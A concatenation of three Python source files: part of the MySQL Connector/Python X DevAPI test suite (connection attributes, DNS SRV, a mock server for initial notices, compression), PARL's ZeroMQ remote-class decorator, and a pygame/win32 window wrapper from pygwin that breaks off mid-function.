uri_test = "{}?connection_attributes={}".format(uri, valid_attr)
mysqlx.get_session(uri_test)
# Test valid generic values when passing a dict with connection data
valid_conn_attrs = [{}, "False", "True", "false", "true", {"valid": ""},
{"valid": None}, {"valid1": 1}, True, False, 1, 0,
[], ['a1=2', 'a3'], {"valid"}, {"foo", "bar"}]
for conn_attr in valid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
mysqlx.get_session(connect_kwargs)
# Test invalid generic values when passing a dict with connection data
invalid_conn_attrs = [{1:"1"}, {1:2}, {"_invalid":""}, {"_": ""},
123, 123.456, None, {"_invalid"}, ['_a1=2',]]
for conn_attr in invalid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
# Validate the user defined attributes are created in the server
# Test user defined connection attributes through a connection URL
connection_attributes = {
"foo": "bar",
"baz": "zoom",
"quash": "",
"puuuuum": "kaplot"
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
# Verify user defined session-connection-attributes are in the server
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
expected_attrs = connection_attributes.copy()
expected_attrs.update({
"_pid": str(os.getpid()),
"_platform": self.platform_arch,
"_source_host": socket.gethostname(),
"_client_name": "mysql-connector-python",
"_client_license": self.client_license,
"_client_version": ".".join([str(x) for x in VERSION[0:3]]),
"_os": self.os_ver
})
# Note that for an empty string "" value the server stores a Null value
expected_attrs["quash"] = "None"
for row in rows:
self.assertEqual(expected_attrs[row.get_string('ATTR_NAME')],
row.get_string('ATTR_VALUE'),
"Attribute {} with value {} differs of {}".format(
row.get_string('ATTR_NAME'),
row.get_string('ATTR_VALUE'),
expected_attrs[row.get_string('ATTR_NAME')]))
# Verify that setting connection attributes on the server can be skipped
# by passing "connection_attributes"=false in the URI
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes="false")
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
self.assertEqual(len(rows), 0, "connection attributes were created "
"although it was specified not to do so: {}".format(rows))
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 19),
"MySQL 8.0.19+ is required for DNS SRV")
@unittest.skipIf(not HAVE_DNSPYTHON,
"dnspython module is required for DNS SRV")
def test_dns_srv(self):
# The value of 'dns-srv' must be a boolean
uri = "root:@localhost/myschema?dns-srv=invalid"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
config = {"host": "localhost", "user": "root", "dns-srv": 0}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config = {"host": "localhost", "user": "root", "dns-srv": 1}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config = {"host": "localhost", "user": "root", "dns-srv": None}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Using Unix domain sockets with DNS SRV lookup is not allowed
uri = "mysqlx+srv://root:@localhost/myschema?socket=/tmp/mysql.sock"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Specifying a port number with DNS SRV lookup is not allowed
uri = "mysqlx+srv://root:@localhost:33060/myschema"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Specifying multiple hostnames with DNS SRV look up is not allowed
uri = "mysqlx+srv://root:@[host1, host2, host3]/myschema"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# The option 'dns-srv' is not allowed in connection string options
uri = "mysqlx+srv://root:@localhost/myschema?dns-srv=true"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
def test_context_manager(self):
"""Test mysqlx.get_session() context manager."""
with mysqlx.get_session(self.connect_kwargs) as session:
self.assertIsInstance(session, mysqlx.Session)
self.assertTrue(session.is_open())
self.assertFalse(session.is_open())
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 20), "XPlugin not compatible")
class MySQLxInitialNoticeTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.settings = {
"user": "root",
"password": "",
"host": "localhost",
"ssl-mode": "disabled",
"compression": "disabled",
}
def _server_thread(self, host="localhost", port=33061, notice=1):
stream = ServerSocketStream()
stream.start_receive(host, port)
reader = MessageReader(stream)
writer = MessageWriter(stream)
protocol = ServerProtocol(reader, writer)
# Read message header
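# X Protocol frames start with a 4-byte little-endian length (which includes
# the type byte) followed by a 1-byte message type; the payload that follows
# is therefore msg_len - 1 bytes long.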
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
_ = stream.read(msg_len - 1)
self.assertEqual(msg_type, 1)
# Send server capabilities
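# The blob below is a pre-captured capabilities reply; its readable strings
# show it advertises tls, authentication.mechanisms (MYSQL41, SHA256_MEMORY),
# doc.formats, client.interactive, the compression algorithms and node_type.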
stream.sendall(b'\x05\x00\x00\x00\x0b\x08\x05\x1a\x00P\x01\x00'
b'\x00\x02\n\x0f\n\x03tls\x12\x08\x08\x01\x12\x04'
b'\x08\x07@\x00\nM\n\x19authentication.mechanisms'
b'\x120\x08\x03",\n\x11\x08\x01\x12\r\x08\x08J\t\n'
b'\x07MYSQL41\n\x17\x08\x01\x12\x13\x08\x08J\x0f\n'
b'\rSHA256_MEMORY\n\x1d\n\x0bdoc.formats\x12\x0e'
b'\x08\x01\x12\n\x08\x08J\x06\n\x04text\n\x1e\n'
b'\x12client.interactive\x12\x08\x08\x01\x12\x04'
b'\x08\x07@\x00\nn\n\x0bcompression\x12_\x08\x02'
b'\x1a[\nY\n\talgorithm\x12L\x08\x03"H\n\x18\x08'
b'\x01\x12\x14\x08\x08J\x10\n\x0edeflate_stream\n'
b'\x15\x08\x01\x12\x11\x08\x08J\r\n\x0blz4_message'
b'\n\x15\x08\x01\x12\x11\x08\x08J\r\n\x0b'
b'zstd_stream\n\x1c\n\tnode_type\x12\x0f\x08\x01'
b'\x12\x0b\x08\x08J\x07\n\x05mysql\n \n\x14'
b'client.pwd_expire_ok\x12\x08\x08\x01\x12\x04\x08'
b'\x07@\x00\x01\x00\x00\x00\x00')
# read client capabilities
frame_size, frame_type = struct.unpack("<LB", stream.read(5))
_ = stream.read(frame_size - 1)
self.assertEqual(frame_type, 2)
frame_size, frame_type = struct.unpack("<LB", stream.read(5))
self.assertEqual(frame_type, 4)
# Read payload
_ = stream.read(frame_size - 1)
# send handshake
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# send auth start
protocol.send_auth_continue_server("00000000000000000000")
# Capabilities are not checked for ssl-mode: disabled
# Reading auth_continue from client
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 5)
# Read payload
_ = stream.read(msg_len - 1)
# Send auth_ok
protocol.send_auth_ok()
# Read query message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 12)
# Read payload
_ = stream.read(msg_len - 1)
# send empty notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 12 Mysqlx.Resultset.ColumnMetaData
stream.sendall(b"\x32\x00\x00\x00\x0c"
b"\x08\x07\x40\xff\x01\x50\xc0\x01\x58\x10\x12"
b"\x08\x44\x61\x74\x61\x62\x61\x73\x65\x1a\x08"
b"\x44\x61\x74\x61\x62\x61\x73\x65\x22\x08\x53"
b"\x43\x48\x45\x4d\x41\x54\x41\x2a\x00\x32\x00"
b"\x3a\x03\x64\x65\x66")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 13 Mysqlx.Resultset.Row
# information_schema
stream.sendall(b"\x16\x00\x00\x00\x0d"
b"\x0a\x13\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69"
b"\x6f\x6e\x5f\x73\x63\x68\x65\x6d\x61\x00"
# myconnpy
b"\x0c\x00\x00\x00\x0d"
b"\x0a\x09\x6d\x79\x63\x6f\x6e\x6e\x70\x79\x00"
b"\x09\x00\x00\x00\x0d"
# mysql
b"\x0a\x06\x6d\x79\x73\x71\x6c\x00"
b"\x16\x00\x00\x00\x0d"
# performance_schema
b"\x0a\x13\x70\x65\x72\x66\x6f\x72\x6d\x61\x6e"
b"\x63\x65\x5f\x73\x63\x68\x65\x6d\x61\x00"
b"\x07\x00\x00\x00\x0d"
# sys
b"\x0a\x04\x73\x79\x73\x00")
# msg_type: 14 Mysqlx.Resultset.FetchDone
stream.sendall(b"\x01\x00\x00\x00\x0e")
# msg_type: 11 Mysqlx.Notice.Frame
stream.sendall(b"\x0f\x00\x00\x00\x0b\x08\x03\x10\x02\x1a\x08\x08"
b"\x04\x12\x04\x08\x02\x18\x00")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 17 Mysqlx.Sql.StmtExecuteOk
stream.sendall(b"\x01\x00\x00\x00\x11")
stream.sendall(b"\x01\x00\x00\x00\x00")
# Read message close connection
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
# Read payload
_ = stream.read(msg_len - 1)
self.assertEqual(msg_type, 7)
# Close socket
stream.close()
@unittest.skipIf(not HAVE_MYSQLXPB_CEXT, "C Extension not available")
def test_initial_empty_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 10
worker1 = Thread(target=self._server_thread, args=[host, port, 1])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_initial_empty_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 20
worker2 = Thread(target=self._server_thread, args=[host, port, 1])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_initial_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 11
worker1 = Thread(target=self._server_thread, args=[host, port, 2])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_initial_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 21
worker2 = Thread(target=self._server_thread, args=[host, port, 2])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 20), "Compression not available")
class MySQLxCompressionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
self.session = mysqlx.get_session(self.connect_kwargs)
def tearDown(self):
self.session.close()
def _get_mysqlx_bytes(self, session):
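# Return the Mysqlx_bytes_* status variables as a {name: int} mapping.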
res = session.sql("SHOW STATUS LIKE 'Mysqlx_bytes%'").execute()
return {key: int(val) for key, val in res.fetch_all()}
def _get_random_data(self, size):
return "".join([random.choice(string.ascii_letters + string.digits)
for _ in range(size)])
def _set_compression_algorithms(self, algorithms):
self.session.sql("SET GLOBAL mysqlx_compression_algorithms='{}'"
"".format(algorithms)).execute()
def test_compression_negotiation(self):
config = self.connect_kwargs.copy()
res = self.session.sql(
"SHOW VARIABLES LIKE 'mysqlx_compression_algorithms'").execute()
default_algorithms = res.fetch_all()[0][1]
# Set default compression settings on the server
self._set_compression_algorithms("lz4_message,deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
# The lz4 should have the highest priority
if HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# The zstd_stream should have the highest priority
self._set_compression_algorithms(
"zstd_stream,lz4_message,deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
if HAVE_ZSTD:
self.assertEqual("zstd_stream", algorithm)
elif HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# Disable lz4 and zstd
self._set_compression_algorithms("deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
# The compression algorithm negotiation should fail when there is no
# compression algorithm available in the server and compress is
# required
config["compression"] = "required"
self._set_compression_algorithms("")
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Using compress='disabled' should work even when there is no
# compression algorithm available in the server
config["compression"] = "disabled"
session = mysqlx.get_session(config)
session.close()
# Should fail when using an invalid compress option
config["compression"] = "invalid"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Restore the default compression algorithms
self._set_compression_algorithms(default_algorithms)
def test_compression_sizes(self):
coll_name = "compress_col"
# Test using the default compression settings on the server
session = mysqlx.get_session(self.connect_kwargs)
sizes = self._get_mysqlx_bytes(session)
self.assertEqual(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertEqual(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
session.close()
# Test with a payload below mysqlx.protocol.COMPRESSION_THRESHOLD (1000 bytes)
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
coll = schema.create_collection(coll_name)
coll.add({"data": self._get_random_data(900)}).execute()
sizes = self._get_mysqlx_bytes(session)
self.assertEqual(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertEqual(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
schema.drop_collection(coll_name)
session.close()
# Test with a payload above mysqlx.protocol.COMPRESSION_THRESHOLD (1000 bytes)
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
coll = schema.create_collection(coll_name)
coll.add({"data": self._get_random_data(2000)}).execute()
sizes = self._get_mysqlx_bytes(session)
self.assertGreater(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
schema.drop_collection(coll_name)
session.close()
def test_compression_algorithms(self):
config = self.connect_kwargs.copy()
res = self.session.sql(
"SHOW VARIABLES LIKE 'mysqlx_compression_algorithms'").execute()
default_algorithms = res.fetch_all()[0][1]
# Set the server compression algorithms
self._set_compression_algorithms(
"deflate_stream,lz4_message,zstd_stream")
# Test algorithms with a given order with aliases
config["compression-algorithms"] = "deflate,lz4"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
if HAVE_LZ4:
config["compression-algorithms"] = "lz4,deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("lz4_message", algorithm)
session.close()
# Test with unsupported algorithms by the client
config["compression-algorithms"] = "unsupported,deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
# Test with compression="required" and without compression algorithms
config["compression"] = "required"
config["compression-algorithms"] = []
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
if HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# Test with compression="required" and with unsupported compression
# algorithms
config["compression"] = "required"
config["compression-algorithms"] = "unsupported"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Test with compression="required", with supported compression
# algorithms, but not supported by the server
self._set_compression_algorithms("lz4_message")
config["compression"] = "required"
config["compression-algorithms"] = "deflate"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Test with compression="preferred" and with unsupported compression
# algorithms
config["compression"] = "preferred"
config["compression-algorithms"] = "unsupported"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertIsNone(algorithm) # None means that compression is disabled
session.close()
# Test with compression="disabled" and with valid compression
# algorithms
config["compression"] = "disabled"
config["compression-algorithms"] = "deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertIsNone(algorithm) # None means that compression is disabled
session.close()
del config["compression"]
# Test with unsupported algorithms by the server
if not HAVE_LZ4:
# Disable lz4
self._set_compression_algorithms("deflate_stream")
config["compression-algorithms"] = "lz4"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
# None means that compression is disabled
self.assertIsNone(algorithm)
# Restore the default compression algorithms
self._set_compression_algorithms(default_algorithms)
|
remote_decorator.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pyarrow
import sys
import threading
import time
import traceback
import zmq
from parl.remote import remote_constants
from parl.utils import get_ip_address, logger, to_str, to_byte
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.utils.communication import loads_argument, dumps_return
"""
Three steps to create a remote class:
1. add a decorator (@parl.remote_class) before the definition of the class;
2. create an instance of the remote class;
3. call function `as_remote` with server_ip and server_port.
@parl.remote_class
class Simulator(object):
...
sim = Simulator()
sim.as_remote(server_ip='172.18.202.45', server_port=8001)
"""
def remote_class(cls):
class ClientWrapper(object):
"""
Wrapper for the remote class on the client side.
Once the as_remote function is called, the object initialized in the
client can handle function calls coming from the server.
"""
def __init__(self, *args, **kwargs):
"""
Args:
args, kwargs: arguments for the initialisation of the unwrapped class.
"""
self.unwrapped = cls(*args, **kwargs)
self.zmq_context = None
self.poller = None
# socket used to connect to the server and report the client's ip and port
self.connect_socket = None
# socket that handles function calls coming from the server side
self.reply_socket = None
def _create_reply_socket(self, remote_ip, remote_port):
"""
The client side also runs a socket server. It keeps running and
waits for requests (e.g. a function call) from the server side.
"""
if remote_ip is None:
remote_ip = get_ip_address()
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.REP)
if remote_port is None:
try:
remote_port = socket.bind_to_random_port(addr="tcp://*")
except zmq.ZMQBindError:
logger.error(
'Can not bind to a random port, please set remote_port manually.'
)
sys.exit(1)
else:
socket.bind("tcp://*:{}".format(remote_port))
return socket, remote_ip, remote_port
def _connect_server(self, server_ip, server_port, remote_ip,
remote_port):
"""
Create the connection between client side and server side.
Args:
server_ip(str): the ip of the server.
server_port(int): the connection port of the server.
remote_ip: the ip of the client itself.
remote_port: the port of the client itself,
which is used to create the reply socket.
"""
self.reply_socket, local_ip, local_port = self._create_reply_socket(
remote_ip, remote_port)
self.reply_socket.linger = 0
socket = self.zmq_context.socket(zmq.REQ)
socket.connect("tcp://{}:{}".format(server_ip, server_port))
logger.info("connecting {}:{}".format(server_ip, server_port))
client_addr = '{}:{}'.format(local_ip, local_port)
socket.send_multipart(
[remote_constants.CONNECT_TAG,
to_byte(client_addr)])
message = socket.recv_multipart()
self.client_id = message[1]
logger.info("connect server done, client_id: {}".format(
self.client_id))
self.connect_socket = socket
self.connect_socket.linger = 0
def _exit_remote(self):
self.poller.unregister(self.connect_socket)
self.connect_socket.close()
self.reply_socket.close()
# The program may hang when destroying zmq context manually.
# It will be destroyed automatically by the garbage collection mechanism of python,
# though it may raise some exceptions in C++.
#self.zmq_context.destroy()
def _heartbeat_loop(self):
"""
Periodically detect whether the server is alive or not
"""
self.poller = zmq.Poller()
self.poller.register(self.connect_socket, zmq.POLLIN)
while True:
self.connect_socket.send_multipart(
[remote_constants.HEARTBEAT_TAG, self.client_id])
# wait for at most 10s to receive response
socks = dict(self.poller.poll(10000))
if socks.get(self.connect_socket) == zmq.POLLIN:
_ = self.connect_socket.recv_multipart()
else:
logger.warning(
'[HeartBeat] Server no response, will exit now!')
self._exit_remote()
break
# Wait for the configured heartbeat interval before sending the next ping
time.sleep(remote_constants.HEARTBEAT_INTERVAL_S)
def __getattr__(self, attr):
"""
Call the function of the unwrapped class.
"""
def wrapper(*args, **kwargs):
return getattr(self.unwrapped, attr)(*args, **kwargs)
return wrapper
def _reply_loop(self):
while True:
message = self.reply_socket.recv_multipart()
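# Multipart layout used below: message[1] carries the function name and
# message[2] the serialized (args, kwargs); message[0] is assumed to be the
# request tag sent by the server.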
try:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
ret = getattr(self.unwrapped, function_name)(*args,
**kwargs)
ret = dumps_return(ret)
except Exception as e:
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
self.reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
elif type(e) == SerializeError:
self.reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
elif type(e) == DeserializeError:
self.reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
else:
traceback_str = str(traceback.format_exc())
logger.error('traceback:\n{}'.format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + '\ntraceback:\n' +
traceback_str)
])
continue
self.reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
def as_remote(self,
server_ip,
server_port,
remote_ip=None,
remote_port=None):
"""
Client will connect server and wait for function calls from server side.
Args:
server_ip(str): server's ip
server_port(int): server's port
remote_ip: the ip of the client itself.
remote_port: the port of the client itself,
which is used to create the reply socket.
"""
self._connect_server(server_ip, server_port, remote_ip,
remote_port)
reply_thread = threading.Thread(target=self._reply_loop)
reply_thread.daemon = True
reply_thread.start()
self._heartbeat_loop()
def remote_closed(self):
"""
Check whether as_remote mode is closed
"""
assert self.reply_socket is not None, 'as_remote function should be called first!'
assert self.connect_socket is not None, 'as_remote function should be called first!'
return self.reply_socket.closed and self.connect_socket.closed
return ClientWrapper
|
_win.py
|
from pygwin.surface import surface as _surface
from pygwin.tray import tray as _tray
from datetime import datetime as _dt
from pygwin.image import save as _s
from pygwin._pg import pg as _pg
import pygwin.image as _img
try:
import win32job as _w32j
import win32api as _w32a
import win32con as _w32c
import win32gui as _w32g
nonwin32api = False
except ImportError:
nonwin32api = True
import sys as _sys
import warnings as _warn
import winerror as _we
import requests as _req
import tempfile as _tf
import threading as _t
import pickle as _p
import mouse as _m
import time as _ti
class _win(_surface):
def __init__(self, iconpath=None):
self._orig = _pg.display.get_surface()
super().__init__(self._orig.get_size())
self._orig = _pg.display.get_surface()
self._clock = _pg.time.Clock()
self._withfps = False
self._iconpath = iconpath
self._isallowdrag = False
# self._issmartdrag = False
        if iconpath is not None:
self.tray = _tray(self.title,iconpath)
def update(self, fps=-1):
if fps != -1:
self._clock.tick(fps)
self._withfps = True
_pg.display.update()
def resize(self, size=None):
        if size is None:
return self.size
else:
self._orig = _pg.display.set_mode(size)
def title():
def fget(self):
return _pg.display.get_caption()[0]
def fset(self, value):
if type(value) != str:
return
_pg.display.set_caption(value)
def fdel(self):
pass
return locals()
title = property(**title())
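    # Note (added for clarity): title() above returns its local fget/fset/fdel
    # functions via locals(), which are then unpacked into property(); the same
    # idiom is used for the `size` property below.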
    def icon(self, value):
        _pg.display.set_icon(_pg.image.load(value))
        self._iconpath = value
def size():
def fget(self):
return _pg.display.get_window_size()
def fset(self, value):
            if type(value) not in [list, tuple]:
                return
_pg.display.set_mode(value)
def fdel(self):
pass
return locals()
size = property(**size())
def fullscreen(self):
        _pg.display.toggle_fullscreen()
def close(self):
# _w32g.PostMessage(self.hwnd, _w32c.WM_CLOSE, 0, 0)
_pg.display.quit()
try:self.tray.stop()
except:pass
def focus(self):
if not nonwin32api:
self.hide()
self.show()
_w32g.BringWindowToTop(self.hwnd)
_w32g.ShowWindow(self.hwnd, _w32c.SW_SHOWNORMAL)
_w32g.SetForegroundWindow(self.hwnd)
def hide(self):
if not nonwin32api:
_w32g.ShowWindow(self.hwnd, _w32c.SW_HIDE)
def show(self):
if not nonwin32api:
_w32g.ShowWindow(self.hwnd, _w32c.SW_SHOW)
def move(self, x, y):
if not nonwin32api:
rect = self._getRect()
_w32g.MoveWindow(self.hwnd, int(x), int(y),
rect[2]-x, rect[3]-y, 0)
def screenshot(self, path):
_s(self._orig, path)
return path
    def center(self, x=None, y=None):
        w, h = _pg.display.get_desktop_sizes()[0]
        x = w / 2 if x is None else x
        y = h / 2 if y is None else y
        self.move(x - self.size[0] / 2, y - self.size[1] / 2)
def _getRect(self):
if not nonwin32api:
return _w32g.GetWindowRect(self.hwnd)
def denyDrag(self):
if not nonwin32api:
self._isallowdrag = True
def loop(self):
while self._isallowdrag:
pos = _m.get_position()
pos = [pos[i]-self.position[i] for i in range(2)]
if pos[0] < self._getRect()[2]-137:
if pos[1] < 30:
_m.release('left')
_t.Thread(target=lambda:loop(self),daemon=1).start()
def allowDrag(self):
if not nonwin32api:
self._isallowdrag = False
# def smartDrag(self, x):
# self.allowDrag()
# self._issmartdrag = x
# if x:
# self._isallowdrag = True
# def loop(self):
# wsd = None
# while self._issmartdrag:
# self.update()
# pos = _m.get_position()
# pos = [pos[i]-self.position[i] for i in range(2)]
# if pos[0] < _w32g.GetWindowRect(self.hwnd)[2]-137:
# if pos[1] < 30:
# if _m.is_pressed('left'):
# _m.release('left')
# if wsd == None:
# wsd = pos+list(self.position)
# else:
# if wsd != pos+list(self.position):
# self.move(wsd[2]+(pos[0]-wsd[0]),
# wsd[3]+(pos[1]-wsd[1]))
# else:
# wsd = None
# _ti.sleep(0.5)
# _t.Thread(target=lambda:loop(self),daemon=1).start()
@property
def position(self):
if not nonwin32api:
rect = self._getRect()
x = rect[0]
y = rect[1]
return (x, y)
@property
def rawFps(self):
if self._withfps:
return self._clock.get_fps()
else:
return float(f'2010.{_dt.now().year}')
@property
def fps(self):
return int(self.rawFps)
@property
def hwnd(self):
if not nonwin32api:
return _pg.display.get_wm_info()['window']
@property
def visible(self):
if not nonwin32api:
            return _w32g.IsWindowVisible(self.hwnd)
def create(title=None, size=(0,0), icon=None, resizable=False, noframe=False):
screen = _pg.display.set_mode(size)
if resizable:
screen = _pg.display.set_mode(size,_pg.RESIZABLE)
if noframe:
screen = _pg.display.set_mode(size,_pg.NOFRAME)
else:
if title != None:
_pg.display.set_caption(title)
if icon != None:
_pg.display.set_icon(_pg.image.load(icon))
return _win(icon)
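# Illustrative usage sketch (added; hypothetical values, not from the original source):
#
#     win = create(title="demo", size=(640, 480), resizable=True)
#     win.update(fps=60)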
def ramLimit(memory_limit):
if not nonwin32api:
g_hjob = None
def create_job(job_name='', breakaway='silent'):
hjob = _w32j.CreateJobObject(None, job_name)
if breakaway:
info = _w32j.QueryInformationJobObject(hjob,
_w32j.JobObjectExtendedLimitInformation)
if breakaway == 'silent':
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_SILENT_BREAKAWAY_OK)
else:
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_BREAKAWAY_OK)
_w32j.SetInformationJobObject(hjob,
_w32j.JobObjectExtendedLimitInformation, info)
return hjob
def assign_job(hjob):
            nonlocal g_hjob
hprocess = _w32a.GetCurrentProcess()
try:
